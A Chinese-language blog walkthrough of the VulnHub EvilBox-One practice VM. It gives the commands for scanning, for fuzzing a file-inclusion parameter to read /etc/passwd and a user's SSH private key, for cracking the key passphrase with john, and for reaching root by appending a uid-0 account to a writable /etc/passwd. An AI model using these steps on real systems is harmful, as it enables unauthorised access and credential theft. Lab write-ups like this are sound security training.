看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One

简介: 看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One

@TOC

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

老样子需要找到flag即可。

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.101 靶机IP :192.168.0.106

使用命令: nmap -sS -sV -A -n 192.168.0.106
在这里插入图片描述

发现开启了22端口和80端口 访问一下80端口是个apache 默认页面 直接dirb 扫一下后台
在这里插入图片描述

在这里插入图片描述

先访问一下robots.txt 好像没啥可用信息 接着扫描 dirb http://192.168.0.106/secret -X .php,.xml,.html

在这里插入图片描述

在这里插入图片描述
访问/secret/evil.php 发现还没有信息,但是感觉这个evil 是邪恶得意思 使用ffuf模糊试探一下。

②:漏洞发现:

apt-get install ffuf ## 安装工具

在这里插入图片描述

ffuf -c -r -u 'http://192.168.0.106/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
192.168.0.106/secret/evil.php?command = /etc/passwd

在这里插入图片描述

③:ssh私钥爆破:

发现有mowree用户,在mowree用户目录下有ssh公钥,尝试创建私钥登录ssh

 http://192.168.0.106/secret/evil.php?command=/home/mowree/.ssh/id_rsa

在这里插入图片描述
把这一串ssh 私钥复制到kaili 给予权限 还要对密码进行破解 不然登入不了

在这里插入图片描述

cd /usr/share//john/
./ssh2john.py id_rsa | tee hash
john hash --wordlist=rockyou.txt  

在这里插入图片描述
这里我试了好多遍 不知道为啥就是破解不出来 (有知道为什么的可以私信一下)看了一下别人的文章 得到密码:unicorn

ssh mowree@192.168.0.106 -i id_rsa
在这里插入图片描述

④:提权:

使用命令:find / -perm /4000 2>/dev/null

使用命令:find / -perm /2000 2>/dev/null 2000

在这里插入图片描述
在这里插入图片描述
发现都没有可以利用的 在使用命令:find / -writable 2>/dev/null | grep -v proc 发现 /etc/passwd有写入权限

在这里插入图片描述

大概思路:既然有写入权限 可以 openssl 生成密码 然后编辑 /etc/passwd 把生成的hack 那一条加密后面的设置和root一样即可。

mowree@EvilBoxOne:~$ openssl passwd -1 123456    #-1代表一种加密方式
$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/

hack:$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/:0:0:root:/root:/bin/bash
vi /etc/passwd  ##写入
cat /etc/passwd  #检测是否成功!

在这里插入图片描述ps:(注意啊 这里的 红箭头basH 大写了 其实写进去的时候没有 问题不大)

su切换hack账户 密码:123456 刚刚设置的 然后就是id 发现是root权限

⑤:获取flag:

在这里插入图片描述
至此获取到了所有得flag,渗透测试结束。

Vulnhub靶机渗透总结:

**1.ffuf 工具进行模糊测试的使用(工具很强大!!)
2.openssl 提权 这个之前DC系列也做过
3.通过SSH私钥登入和id_rsa 私钥的破解需要shh2john脚本(但是我这里卡了一下破解不出来)**

知识点:
一般用户的 .ssh 目录下会存在三个文件:

id_rsa : 私钥
authorized_keys : 认证关键字文件
id_rsa.pub : 公钥

因为放暑假的原因所以也是很久没打靶机了 今天心血来潮更新一下 后续会持续更新 ,创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
47 0
|
1月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
17 0
|
1月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
26 0
|
1月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
22 0
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
77 0
|
8月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
189 0
|
8月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
90 0
|
8月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
121 0
|
8月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
90 0
|
8月前
|
SQL 安全 Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
84 0